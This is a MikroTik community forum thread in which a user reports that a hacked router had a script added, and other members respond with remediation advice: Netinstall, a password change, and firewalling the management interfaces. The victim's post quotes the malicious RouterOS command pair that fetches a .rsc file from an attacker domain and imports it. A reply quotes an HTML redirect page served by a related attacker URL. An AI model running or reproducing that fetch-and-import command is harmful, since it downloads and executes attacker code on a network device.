Community discussions

MikroTik App
 
dipsdips
just joined
Topic Author
Posts: 9
Joined: Mon May 10, 2021 11:31 pm

hacked script

Sun Jul 25, 2021 7:06 pm

hi,

One of our routers was hacked and the following script was added:

/tool fetch url=http://zancetom.com/poll/8e39cd78-78ec- ... 94dc7ccbe8 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
No VLan or VPN's was created but my IP Socks was enabled and had 200 connections.

My firmware was 6.48.2 which I thought was not vulnerable to this hack.

Is there anyway to find out what this was supposed to do?

Thanks.
Last edited by dipsdips on Sun Jul 25, 2021 8:05 pm, edited 1 time in total.
 
Cablenut9
Long time Member
Long time Member
Posts: 542
Joined: Fri Jan 08, 2021 5:30 am

Re: hacked script

Sun Jul 25, 2021 7:35 pm

Post the script content here and let's see what there is, because I don't want to go to that website to find out.
 
msatter
Forum Guru
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: hacked script

Sun Jul 25, 2021 8:13 pm

306 Days ago: https://www.reddit.com/r/mikrotik/comme ... ded_to_my/
<html><head><meta http-equiv="refresh" content="0;url=http://searchguide.level3.com/search/?q=http://gamedate.xyz%2Fpoll%2F7c8c30a0-e932-4a1e-8f03-623d9c04df79&t=0&bc="/></head><body><script type="text/javascript">window.location="http://searchguide.level3.com/search/?q="+escape(window.location)+"&r="+escape(document.referrer)+"&t=0&bc=+"&r="+escape(document.referrer)+"&t=0&bc=)";</script></body></html>
179 Days ago: https://www.reddit.com/r/mikrotik/comme ... ipt_in_my/
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: hacked script

Mon Jul 26, 2021 8:18 am

There are only on solution to fix this and that is Netinstall. https://wiki.mikrotik.com/wiki/Manual:Netinstall
Removing the config is not enough.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10183
Joined: Mon Jun 08, 2015 12:09 pm

Re: hacked script

Mon Jul 26, 2021 12:01 pm

And also:
- change the password
- make sure your router config interface (telnet,ssh,webfig,winbox,api) is NOT accessible from internet.
(using firewall)

The default firewall after a recent RouterOS install on "home routers" (not CCR, RB1100 etc) will be fine.
Note that updating RouterOS does not change the firewall, so when you had a very old install and merely updated it, you could still have a bad firewall.

Who is online

Users browsing this forum: No registered users and 7 guests